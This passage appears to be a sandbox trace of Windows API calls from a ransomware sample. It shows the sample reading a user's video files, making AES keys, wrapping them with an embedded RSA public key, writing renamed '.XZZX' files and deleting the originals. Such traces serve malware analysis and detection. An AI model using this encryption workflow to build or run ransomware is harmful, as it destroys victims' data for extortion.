dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x397b [0129.953] WriteFile (in: hFile=0x67c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0129.953] SetFilePointer (in: hFile=0x67c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3980 [0129.953] WriteFile (in: hFile=0x67c, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x18, lpOverlapped=0x0) returned 1 [0129.953] SetFilePointer (in: hFile=0x67c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3998 [0129.953] WriteFile (in: hFile=0x67c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0129.953] SetFilePointer (in: hFile=0x67c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x399d [0129.953] SetErrorMode (uMode=0x1) returned 0x1 [0129.953] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0129.953] OutputDebugStringW (lpOutputString="end") [0129.954] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0129.954] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0129.954] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3d1faa8) returned 1 [0129.954] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1faa8, dwCertEncodingType=0x1, pInfo=0x3d0e998*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0e9c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0e9d0*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cde758) returned 1 [0129.954] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0129.955] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0129.955] CryptEncrypt (in: hKey=0x3cde758, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0129.955] CryptEncrypt (in: hKey=0x3cde758, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1fb30*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1fb30*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0129.955] WriteFile (in: hFile=0x67c, lpBuffer=0x3d1fb30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1fb30*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0129.955] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0129.955] WriteFile (in: hFile=0x67c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0129.955] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0129.955] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0129.955] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x684) returned 0x0 [0129.955] RegQueryValueExW (in: hKey=0x684, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xae, lpcbData=0x420dfdc*=0x4) returned 0x0 [0129.955] RegCloseKey (hKey=0x684) returned 0x0 [0129.955] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x684) returned 0x0 [0129.955] RegSetValueExW (in: hKey=0x684, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xaf, cbData=0x4 | out: lpData=0x420dfec*=0xaf) returned 0x0 [0129.955] RegCloseKey (hKey=0x684) returned 0x0 [0129.955] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.956] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.956] CloseHandle (hObject=0x67c) returned 1 [0129.957] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0129.957] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0129.957] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\ArnUUg6o.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\arnuug6o.mkv")) returned 1 [0129.960] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\ArnUUg6o.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\arnuug6o.mkv")) returned 0 Thread: id = 439 os_tid = 0x9f0 [0130.210] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0130.210] lstrcpyW (in: lpString1=0x420f460, lpString2="7TSkSEjcLf8xikPUr.avi" | out: lpString1="7TSkSEjcLf8xikPUr.avi") returned="7TSkSEjcLf8xikPUr.avi" [0130.210] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0130.210] SetErrorMode (uMode=0x1) returned 0x1 [0130.210] lstrcpyW (in: lpString1=0x420f860, lpString2="7TSkSEjcLf8xikPUr.avi" | out: lpString1="7TSkSEjcLf8xikPUr.avi") returned="7TSkSEjcLf8xikPUr.avi" [0130.210] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x2497439f, Data2=0xcbbc, Data3=0x45e7, Data4=([0]=0xa7, [1]=0x2c, [2]=0x98, [3]=0x4c, [4]=0x3, [5]=0x56, [6]=0x86, [7]=0xf5))) returned 0x0 [0130.210] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\7TSkSEjcLf8xikPUr.avi") returned 101 [0130.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0130.211] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\D1B4BDC437A182A42497439F3BC266EC.XZZX") returned 117 [0130.211] StrStrW (lpFirst="7TSkSEjcLf8xikPUr.avi", lpSrch="XZZX") returned 0x0 [0130.211] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\7TSkSEjcLf8xikPUr.avi", dwFileAttributes=0x20) returned 1 [0130.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\7TSkSEjcLf8xikPUr.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\7tsksejclf8xikpur.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x684 [0130.213] ReadFile (in: hFile=0x684, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0xf98e, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x420e418*=0xf98e, lpOverlapped=0x0) returned 1 [0130.214] CloseHandle (hObject=0x684) returned 1 [0130.214] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0130.215] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0130.215] SetErrorMode (uMode=0x1) returned 0x1 [0130.215] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0130.215] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1fbb8) returned 1 [0130.217] CryptGenKey (in: hProv=0x3d1fbb8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde698) returned 1 [0130.709] CryptExportKey (in: hKey=0x3cde698, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0130.709] CryptExportKey (in: hKey=0x3cde698, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0130.710] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0130.710] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0130.710] CryptDestroyKey (hKey=0x3cde698) returned 1 [0130.710] CryptReleaseContext (hProv=0x3d1fcc8, dwFlags=0x0) returned 0 [0130.711] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\D1B4BDC437A182A42497439F3BC266EC.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\d1b4bdc437a182a42497439f3bc266ec.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x69c [0130.711] WriteFile (in: hFile=0x69c, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0xf98e, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x420e438*=0xf98e, lpOverlapped=0x0) returned 1 [0130.712] SetFilePointer (in: hFile=0x69c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf98e [0130.713] WriteFile (in: hFile=0x69c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0130.713] SetFilePointer (in: hFile=0x69c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf993 [0130.713] WriteFile (in: hFile=0x69c, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x2a, lpOverlapped=0x0) returned 1 [0130.713] SetFilePointer (in: hFile=0x69c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf9bd [0130.713] WriteFile (in: hFile=0x69c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0130.713] SetFilePointer (in: hFile=0x69c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf9c2 [0130.713] SetErrorMode (uMode=0x1) returned 0x1 [0130.713] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0130.713] OutputDebugStringW (lpOutputString="end") [0130.713] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----vX\x8aÊ\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0130.713] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0130.713] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3d1fd50) returned 1 [0130.714] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1fd50, dwCertEncodingType=0x1, pInfo=0x3d0ec08*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0ec38*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0ec40*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cde698) returned 1 [0130.714] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0130.715] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0130.715] CryptEncrypt (in: hKey=0x3cde698, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0130.715] CryptEncrypt (in: hKey=0x3cde698, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1fdd8*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1fdd8*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0130.715] WriteFile (in: hFile=0x69c, lpBuffer=0x3d1fdd8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1fdd8*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0130.715] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0130.715] WriteFile (in: hFile=0x69c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0130.715] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0130.715] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0130.716] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x6a8) returned 0x0 [0130.716] RegQueryValueExW (in: hKey=0x6a8, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xaf, lpcbData=0x420dfdc*=0x4) returned 0x0 [0130.716] RegCloseKey (hKey=0x6a8) returned 0x0 [0130.716] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x6a8) returned 0x0 [0130.716] RegSetValueExW (in: hKey=0x6a8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xb0, cbData=0x4 | out: lpData=0x420dfec*=0xb0) returned 0x0 [0130.716] RegCloseKey (hKey=0x6a8) returned 0x0 [0130.716] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.716] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.717] CloseHandle (hObject=0x69c) returned 1 [0130.718] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0130.719] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0130.719] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\7TSkSEjcLf8xikPUr.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\7tsksejclf8xikpur.avi")) returned 1 [0130.720] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\7TSkSEjcLf8xikPUr.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\7tsksejclf8xikpur.avi")) returned 0 Thread: id = 440 os_tid = 0x9fc [0130.367] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0130.367] lstrcpyW (in: lpString1=0x434f460, lpString2="bAFZ2xGuKI.swf" | out: lpString1="bAFZ2xGuKI.swf") returned="bAFZ2xGuKI.swf" [0130.367] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0130.367] SetErrorMode (uMode=0x1) returned 0x1 [0130.367] lstrcpyW (in: lpString1=0x434f860, lpString2="bAFZ2xGuKI.swf" | out: lpString1="bAFZ2xGuKI.swf") returned="bAFZ2xGuKI.swf" [0130.367] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0xfe65ead4, Data2=0x8947, Data3=0x421d, Data4=([0]=0x94, [1]=0xc4, [2]=0xce, [3]=0x45, [4]=0x83, [5]=0x8a, [6]=0xea, [7]=0x14))) returned 0x0 [0130.367] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\bAFZ2xGuKI.swf") returned 94 [0130.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0130.367] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\18EF94CC2373DB0BFE65EAD427A8BF53.XZZX") returned 117 [0130.367] StrStrW (lpFirst="bAFZ2xGuKI.swf", lpSrch="XZZX") returned 0x0 [0130.367] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\bAFZ2xGuKI.swf", dwFileAttributes=0x20) returned 1 [0130.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\bAFZ2xGuKI.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\bafz2xguki.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0130.411] ReadFile (in: hFile=0x690, lpBuffer=0x3d05f58, nNumberOfBytesToRead=0x1d67, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3d05f58*, lpNumberOfBytesRead=0x434e418*=0x1d67, lpOverlapped=0x0) returned 1 [0130.412] CloseHandle (hObject=0x690) returned 1 [0130.412] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0130.412] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0130.413] SetErrorMode (uMode=0x1) returned 0x1 [0130.413] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0130.413] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: 